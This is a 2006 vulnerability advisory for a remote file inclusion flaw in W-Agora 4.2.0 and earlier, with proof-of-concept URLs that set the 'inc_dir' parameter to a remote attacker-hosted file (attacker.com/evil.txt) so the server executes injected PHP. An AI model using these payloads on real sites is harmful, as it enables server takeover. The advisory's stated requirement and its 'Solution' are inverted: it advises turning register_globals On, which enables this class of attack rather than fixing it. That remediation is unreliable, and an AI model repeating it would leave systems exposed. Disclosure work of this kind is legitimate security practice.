ECHO.OR.ID ECHO_ADV_34$2006 --------------------------------------------------------------------------------------------------- [ECHO_ADV_34$2006] W-Agora (Web-Agora) <= 4.2.0 (inc_dir) Remote File Inclusion --------------------------------------------------------------------------------------------------- Author : Dedi Dwianto a.k.a the_day Date Found : June, 20th 2006 Location : Indonesia, Jakarta web : http://advisories.echo.or.id/adv/adv34-theday-2006.txt Critical Lvl : Highly critical Impact : System access Where : From Remote --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ W-Agora (Web-Agora) Application : W-Agora (Web-Agora) version : <= 4.2.0 URL : http://w-agora.net Description : W-Agora (Web-Agora) is a database-driven communications system which allows you and your visitors to store and display messages, files, and other information on your web site. More than "just another Web BBS/forum software", W-Agora is designed so it can be easily customizable through a Web browser and the use of templates. It can be used as a BBS, guestbook, download area, or publishing system. Several database backends are supported such as MySQL, Postgres, mSQL, Oracle and DBM. --------------------------------------------------------------------------- Vulnerability: ~~~~~~~~~~~~~~~~ -----------------------insert.php---------------------- .... indexNotes(); } ?> ... ---------------------------------------------------------- Input passed to the "inc_dir" parameter in insert.php is not properly verified before being used. This can be exploited to execute arbitrary PHP code by including files from local or external resources Affected files: admin_notes.php admin_subscribed_user.php admin_user.php browse_avatar.php close.php create_forum.php create_site.php create_user.php delete.php delete_site.php download_forum.php editconf.php edit_site.php export.php forgot_password.php index.php insert.php search.php view.php update.php setup.php profile.php register.php rss.php list.php forgot_password.php include/mail.php include/fileupload.php include/msql.php include/dbaccess.php include/form.php include/postgres65.php include/postgres.php include/mysql.php extras/quicklist.php extras/shared_user.php user/ldap_example.php tools/upgrade_401.php tools/upgrade_402.php tools/upgrade_42.php tools/upgrade_site_401.php tools/upgrade_site_402.php Successful exploitation requires that "register_globals= Off ". Proof Of Concept: ~~~~~~~~~~~~~~~~~ http://target.com/[w-agora_path]/index.php?inc_dir=http://target.com//inject.txt? http://target.com/[w-agora_path]/search.php?inc_dir=http://attacker.com/evil.txt? http://target.com/[w-agora_path]/view.php?inc_dir=http://attacker.com/evil.txt? http://target.com/[w-agora_path]/update.php?inc_dir=http://attacker.com/evil.txt? http://target.com/[w-agora_path]/tools/upgrade_401.php?inc_dir=http://attacker.com/evil.txt? http://target.com/[w-agora_path]/include/mail.php?inc_dir=http://attacker.com/evil.txt? http://target.com/[w-agora_path]/extras/quicklist.php?inc_dir=http://attacker.com/evil.txt? http://target.com/[w-agora_path]/register.php?inc_dir=http://attacker.com/evil.txt? http://target.com/[w-agora_path]/rss.php?inc_dir=http://attacker.com/evil.txt? and more Affected files Solution: ~~~~~~~~~ Change register_globals= On in php.ini --------------------------------------------------------------------------- Shoutz: ~~~~~~~ ~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous,kaiten ~ Lieur-Euy,Mr_ny3m,bithedz,an0maly ~ newbie_hacker[at]yahoogroups.com ~ #aikmel #e-c-h-o @irc.dal.net --------------------------------------------------------------------------- Contact: ~~~~~~~~ the_day || echo|staff || the_day[at]echo[dot]or[dot]id Homepage: http://theday.echo.or.id/ -------------------------------- [ EOF ] ----------------------------------